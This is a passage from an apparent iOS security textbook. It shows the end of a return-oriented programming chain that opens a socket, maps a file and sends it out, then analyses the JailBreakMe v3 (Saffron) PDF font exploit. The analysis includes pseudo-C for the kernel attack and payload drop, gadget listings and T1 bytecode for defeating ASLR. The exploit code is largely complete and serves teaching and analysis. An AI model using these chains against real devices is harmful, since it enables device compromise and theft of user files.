      //32943b64 e8bd80f0 ldmia    sp!, {r4, r5, r6, r7, pc}

      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x12345687;
      ropvalues[i++] = 0x66554422;
      ropvalues[i++] = 0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++] = locSock;      // r0  socket
      ropvalues[i++] = locSockStruct;  // r1  struct
      ropvalues[i++] =0x00000010;      // r2 struct size
      ropvalues[i++] =0xddddeeee;      // r3
      ropvalues[i++] = 0x328c4ac9;      //
      //328c4ac8      6800    ldr   r0, [r0, #0]
      //328c4aca      bd80    pop   {r7, pc}

      ropvalues[i++]= 0x99886655; //garbage r7
      ropvalues[i++] = 0x328e9c30; //call connect
                  //connect returns to lr which points to 32987bae

      ropvalues[i++] = 0x00000000; //r1
      ropvalues[i++] = 0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++] = locFilename; // r0, fd
      ropvalues[i++] = locStat; // r1, stat structure
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x328c2a4c; //call stat

      //stat returns to lr which points to 32987baf

      ropvalues[i++] = 0xabababab; //r1
      ropvalues[i++] = 0x328c722c; //PC
      //328c722c e8bd8330 ldmia sp!, {r4, r5, r8, r9, pc}

      ropvalues[i++] = 0x00000000; //r4 which will be the address for mmap
      ropvalues[i++] = 0x00000000; //r5 whatever
      ropvalues[i++] = 0x000000000; //r8 is gonna be the file len for mmap
      ropvalues[i++] = 0x000000002; //r9 MAP_PRIVATE copied in r3
      ropvalues[i++] = 0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}
            ropvalues[i++] = locFD - 36;
            // r0 will be the filedes for mmap
      ropvalues[i++] = locStat +60;            // r1 struct stat file size
      ropvalues[i++] = 0x00000001;            // r2 PROT_READ
      ropvalues[i++] = 0x00000000;
            // r3 has to be a valid address, but we don't care what is it
      ropvalues[i++] = 0x32979837;
      //32979836      6a43    ldr   r3, [r0, #36]
      //32979838      6a00    ldr   r0, [r0, #32]
      //3297983a      4418    add   r0, r3
      //3297983c      bd80    pop   {r7, pc}

      ropvalues[i++] = sp + 73*4 + 0x10; //r7 whatever
      ropvalues[i++] = 0x32988673;
      //32988672      bd01  pop  {r0, pc}

      ropvalues[i++] = sp -28; //r0 has to be a piece of memory
we don't care about
      ropvalues[i++] = 0x329253eb;
      //329253ea      6809    ldr   r1, [r1, #0]
      //329253ec      61c1    str   r1, [r0, #28]
      //329253ee     2000    movs  r0, #0
      //329253f0      bd80    pop   {r7, pc}
            ropvalues[i++] = sp + 75*4 + 0xc; //r7
      ropvalues[i++] = 0x328C5CBd;
      //328C5CBC         STR   R3, [SP,#0x24+var_24]
      //328C5CBE         MOV   R3, R9
      //328C5CC0         STR   R4, [SP,#0x24+var_20]
      //328C5CC2         STR   R5, [SP,#0x24+var_1C]
      //328C5CC4         BLX   _mmap
      //328C5CC8 loc_328C5CC8           ; CODE XREF: _mmap+50j
      //328C5CC8         SUB.W  SP, R7, #0x10
      //328C5CCC         LDR.W  R8, [SP+0x24+var_24],#4
      //328C5CD0         POP   {R4-R7,PC}

      ropvalues[i++] = 0xbbccddee;//we need some padding for the previously
stored stuff on the stack
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x32987baf;
      //32987bae   bd02 pop {r1, pc}

            ropvalues[i++] = locMappedFile -8;     
// r1 points to the mapped file in-memory
      ropvalues[i++] = 0x32943b5c;      // PC
      //32943b5c e5810008 str r0, [r1, #8]
      //32943b60 e3a00001 mov r0, #1 ; 0x1
      //32943b64 e8bd80f0 ldmia sp!, {r4, r5, r6, r7, pc}

      ropvalues[i++] = sp; //will be overwritten
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x12345687;
      ropvalues[i++] = 0x12345678;
      ropvalues[i++] = 0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++] = sp -28;      // r0 overwritten when loading r1
      ropvalues[i++] = locMappedFile;  // r1  whatever
      ropvalues[i++] = 0x00000000;      // r2  filled later
      ropvalues[i++] = locStat + 60;      // used later to load
stuff into r2
      ropvalues[i++] = 0x3298d351;
      //3298d350      681a    ldr   r2, [r3, #0]
      //3298d352      6022    str   r2, [r4, #0]
      //3298d354      601c    str   r4, [r3, #0]
      //3298d356     bdb0    pop   {r4, r5, r7, pc}
            ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x00000000;
      ropvalues[i++] = 0x329253eb;
      //329253ea      6809    ldr   r1, [r1, #0]
      //329253ec      61c1    str   r1, [r0, #28]
      //329253ee      2000    movs  r0, #0
      //329253f0      bd80    pop   {r7, pc}

      ropvalues[i++] = 0x11223344;
      ropvalues[i++] = 0x32988673
      //32988672      bd01  pop  {r0, pc}

      ropvalues[i++] = locSock;
      ropvalues[i++] = 0x328c4ac9;
      //328c4ac8      6800    ldr   r0, [r0, #0]
      //328c4aca      bd80    pop   {r7, pc}

      ropvalues[i++]= 0x88776655; //garbage r7
      ropvalues[i++] = 0x32986a41; // PC
      //32986a40    e8bd4080     pop   {r7, lr}
      //32986a44    b001     add  sp, #4
      //32986a46    4770    bx  lr

      ropvalues[i++]=0x12345566; // r7
      ropvalues[i++]=0x3298d3ab; // LR
      ropvalues[i++]=0x12345678; // padding
      //3298d3aa      bd00  pop  {pc}
                  ropvalues[i++] = 0x328e456c;  // call write

      // write returns to lr which points to 0x3298d3ab
            ropvalues[i++] = 0x32988673;
      // 32988672    bd01  pop  {r0, pc}
            ropvalues[i++] = 0x00000001;
      ropvalues[i++] = 0x328fa335; //call sleep();

      // sleep returns to lr which points to 0x3298d3ab

      ropvalues[i++] = 0x32988673;
      // 32988672    bd01  pop   {r0, pc}

      ropvalues[i++] = locFD;       // r0   fd 
      ropvalues[i++] = 0x328c4ac9;//
      //328c4ac8       6800    ldr    r0, [r0, #0]
      //328c4aca       bd80    pop    {r7, pc}

      ropvalues[i++] = 0xccccdddd;
      ropvalues[i++] = 0x328c8d74; //call close()
            // close returns to lr which points to 0x3298d3ab

      ropvalues[i++] = 0x328e469d; // call exit()

Using ROP to Chain Two Exploits (JailBreakMe v3)

As briefly shown in Chapter 7, the JailBreakMe v3 exploit (also known as Saffron) by comex is one of the most impressive exploits publicly available for iOS. We do not go into the details of the exploit itself, but to understand the ROP payload, there is one important detail to take into account.

From iOS 4.3 on, Apple has introduced ASLR, Address space layout randomization; therefore, any exploit willing to use ROP needs to discover the base address of a module. Saffron uses an information leak to determine the base address of the dyld_shared_cache, where all libraries are stored. Once the base address is leaked, Saffron relocates the entire ROP payload accordingly.

Saffron exploits a vulnerability in the PDF reader. Therefore, the entire payload is written using the T1 language. The font file contains several routines. Some of them are particularly useful to understand how the ROP payload works.

You can find a detailed explanation of the exploit at http://esec-lab.sogeti.com/post/Analysis-of-the-jailbreakme-v3-font-exploit. Here we focus on the components that are of interest for the subject. The two routines responsible for writing the payload to memory are routine 8 and routine 9, depending on the iPhone model. A number of auxiliary routines are used:

  • Routines 4, 5, and 7 push values onto the stack, taking into consideration the ASLR slide.
  • Routine 6 pushes a dword added to a stack offset obtained in the exploitation phase.
  • Routines 20 and 21 add or subtract values pushed onto the stack.
  • Routine 24 saves a value pushed onto the stack to an attacker-controlled location.
  • Routine 25 pushes onto the stack an address stored in an attacker-controlled location.

With this information in mind, it is now possible to explain what the shellcode does. The ROP payload in userland roughly performs the following operation in pseudo-C:

mach_port_t self = mach_task_self();
mlock(addr, 0x4a0);
match = IOServiceMatching("AppleRGBOUT");
IOKitWaitQuiet(0, 0);
amatch = IOServiceGetMatchingService(0, match);
IOServiceOpen(amatch, self, 0, &connect);
IOConnectCallScalarMethod(connect, 21, callback, 2, 0, 0);
IOConnectCallStructMethod(connect, 5, kpayload, 0xd8, 0, 0);
IOServiceClose(connect);
munlock(addr, 0x4a0);
void *locutusptr =  malloc(0x8590);
zlib.uncompress(locutusptr, 0x8590, locutussource,0x30eb);
fd = open("/tmp/locutus", O_WRONLY | O_CREAT | O_TRUNC, 0755);
write(fd, locutusptr, 0x8590);
close(fd);
posix_spawn(0, "/tmp/locutus", 0, 0, NULL, NULL);
//this will resume the execution r0 = 1337;
sp = crafted_offset;

What this code does first is map a ROP kernel-land shellcode (kpayload) at a specific address. Afterward, it locates the AppleRGBOUT IOKit service and triggers the vulnerability in the module with the two IOConnectCall functions. At this point the kernel shellcode is executed. This shellcode is again ROP, and it will disable a number of protections, including code signing, so that later on when the execution goes back to userland, the locutus application can run. In fact, the shellcode then continues by unmapping the shellcode, decompressing the locutus binary, writing it to a file, and spawning it.

Finally, to avoid crashing MobileSafari, the execution is restored by carefully setting the stack pointer to a safe location and R0 to a value that represents the return value of the vulnerable function.

Analyzing the entire ROP payload would take an entire chapter for its size and complexity. Therefore, we focus only on some specific gadgets and recurring patterns in it.

First of all, the entire payload is written using Python code that wraps the necessary gadgets. Therefore, there is a high density of repetitive instructions in the resulting shellcode. Without a doubt, the most used and interesting one is the gadget used to call a function. The following gadgets correspond to this C function call, which is used quite frequently in the payload for debugging purposes:

char *str;
fprintf(stderr, "Result for %s was %08x
",  str);
  //it starts with a pop{r4, r7, pc}
0x1e79c    //r4, this is an address that will be adjusted with the infoleak
0x0        //r7        
0x3002b379 //pc, this does: ldr r0, [r0, #0] pop{r7, pc}
0x0        //r7        
0x32882613  //pc, this does: str r0, [r4, #0] pop{r4, pc}
0x1e4c4        //r4, this address will be adjusted with the infoleak    
0x32882613 //pc, this does: str r0, [r4, #0] pop{r4, pc}
0x32c928fd    //r4, address of fprintf     
0x30fb7538   //pc, this does: pop     {r0, r1, r2, r3, pc}
0x3e810084          //r0, address of _stderrp
0x1eec8             //r1, address adjusted with the infoleak
0x1eee0             //r2, address adjusted with the infoleak
0x0                 //r3
0x3002b379  //pc, this does: ldr r0, [r0, #0] pop{r7, pc}
0x1e4d8             //r7, adjusted with the infoleak
0x3001a889           //pc, this does: blx r4 sub sp, r7, #4 pop{r4, r7, pc}
0x332a6129      //r4, address of mach_task_self   
0x1e4e4             //r7, adjusted with the infoleak
0x3001a889   ////pc, this does: blx r4 sub sp, r7, #4 pop{r4, r7, pc}

For the most part, the rest of the code is nothing too complex and it makes a huge use of the previously demonstrated pattern to perform function invocation. The other two relevant parts of the shellcode are the beginning and the end, where the ASLR delta is computed and the execution is restored, respectively.

The T1 routine responsible for writing the payload executes the following instructions at the beginning:

0x00000000  8c           push 0x1                
0x00000001  8c           push 0x1                
0x00000002  a4           push 0x19               
0x00000003  0c 10        callothersubr #25 nargs=1;
 get_buildchar top[0] = decoder->buildchar[idx];

This sequence simply pushes in reverse order the routine number, 0x19, the number of parameters, 0x1, and the parameter to pass to the function. The function pushes onto the stack the address of the C function T1_Parse_Glyph, leaked with the exploit. Later, the following code is executed:

0x00000005  ff 33 73 f6 41   push 0x3373f641         
0x0000000c  8d           push 0x2                
0x0000000d  a0           push 0x15               
0x0000000e  0c 10        callothersubr #21 nargs=2;
substract top[0] -= top[1]; top++

Routine 21 takes the two values pushed onto the stack (the address of the T1_Parse_Glyph function found in-memory and the original address of the same function found inside the library) and pushes the difference between the two that will be stored later in an attacker-controlled location with the following code:

0x00000010  8c           push 0x1                
0x00000011  8d           push 0x2                
0x00000012  a3           push 0x18               
0x00000013  0c 10        callothersubr #24 nargs=2;
 set_buildchar decoder->buildchar[idx] = top[0];

This location that now contains the ASLR delta is used by routines 4, 5, and 7 to correctly relocate the rest of the payload. The next step is to calculate the address of a specific gadget that increments the stack pointer. This is done with the following code:

0x00000015  8b           push 0x0                
0x00000016  ff 32 87 9f 4b   push 0x32879f4b         
0x0000001d  8c           push 0x1                
0x0000001e  8c           push 0x1                
0x0000001f  a4           push 0x19               
0x00000020  0c 10        callothersubr #25 nargs=1;
get_buildchar top[0] = decoder->buildchar[idx];
0x00000022  8d           push 0x2                
0x00000023  9f           push 0x14               
0x00000024  0c 10        callothersubr #20 nargs=2;
add top[0] += top[1]; top++
0x00000026  0c 21        op_setcurrentpoint       ; top -= 2; x=top[0];
 y=top[1]; decoder->flex_state=0

The gadget stored in memory is the first one executed and performs the following operation:

add sp, #320
pop {r4, r5, pc}

The next code snippet pushes onto the stack three dwords necessary for the preceding gadget to work:

0x00000028  8b           push 0x0                
0x00000029  8f           push 0x4                
0x0000002a  0a           callsubr #04             ; subr_put_dword
0x0000002b  8b           push 0x0                
0x0000002c  8f           push 0x4                
0x0000002d  0a           callsubr #04             ; subr_put_dword
0x0000002e  ff 30 00 5c bd   push 0x30005cbd         
0x00000033  ff 00 05 00 0push 0x5            
0x00000038  0a           callsubr #05             ;
subr_put_dword_adjust_lib

This code effectively pushes onto the stack the following dwords:

0x0
0x0
0x30005cbd + ASLR offset

From there, the stack pointer is adjusted once again and the rest of the ROP payload is executed. The final part of the payload sets the register R0 to 1337 and then sets the stack pointer to a location that allows the attacker to resume execution:

0x00000aff  ff 10 00 05 39     push 0x10000539         
0x00000b04  ff 10 00 00 00     push 0x10000000         
0x00000b09  ff 00 02 00 00     push 0x2            
0x00000b0e  ff 00 15 00 00     push 0x15           
0x00000b13  0c 10        callothersubr #21 nargs=2;
subtract top[0] -= top[1]; top++

Because some values cannot be pushed onto the application stack, a trick is used. This trick consists of subtracting two legal values to leave on the stack the one requested. In the previous code, 0x10000539 and 0x10000000 are passed as parameters to function 21. The result of the subtraction is pushed onto the stack, that being 1337. The payload then stores 1337 into R0 by the means of the gadget located at 0x30005e97:

0x00000b17  8b           push 0x0                
0x00000b18  8f           push 0x4                
0x00000b19  0a           callsubr #04             ; subr_put_dword
0x00000b1a  ff 30 00 5e 97   push 0x30005e97         
0x00000b1f  ff 00 05 00 00   push 0x5            
0x00000b24  0a           callsubr #05             ; subr_put_dword_adjust_lib

At this point the only part of the payload missing is to set the stack pointer to a safe location that will not crash the browser:

0x00000b25  8b           push 0x0                
0x00000b26  8f           push 0x4                
0x00000b27  0a           callsubr #04             ; subr_put_dword
0x00000b28  ff 10 00 01 b0  push 0x100001b0         
0x00000b2d  ff 10 00 00 00  push 0x10000000         
0x00000b32  ff 00 02 00 00  push 0x2           
0x00000b37  ff 00 15 00 00  push 0x15           
0x00000b3c  0c 10         callothersubr #21 nargs=2 ;
subtract top[0] -= top[1]; top++
0x00000b3e  91           push 0x6                
0x00000b3f  0a           callsubr #06             ; 6
0x00000b40  ff 30 00 5d b5  push 0x30005db5         
0x00000b45  ff 00 05 00 00  push 0x50000            

The preceding code will, using the usual subtraction trick, push 0x1b0 onto the stack. This value is later added to the value, a stack offset, obtained by routine 6. The gadget at 0x30005db5 sets the stack pointer at the previous value decremented by 0x18, pops from that stack location a number of registers, and resumes MobileSafari execution.

It is pretty obvious that Saffron is a very sophisticated and complex exploit. Hopefully, you have gained some degree of understanding on how the ROP payload inside it works. On the book's website two scripts — Saffron-dump.py and Saffron-ROP-dump.py — are available to help with the dump and analysis of the rest of the shellcode.

Summary

In this chapter you have seen how DEP and code signing can be circumvented using ROP. You started from the original return-to-libc technique and went all the way down to ROP automation.

We proposed a simple way of testing ROP payloads and gave you an overview of what an attacker is capable of doing using this technique on iOS.

Finally, we showed you two real-life examples of complex ROP payloads. The first one exfiltrates data from the phone, and the second one uses a ROP payload to exploit a local kernel vulnerability.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset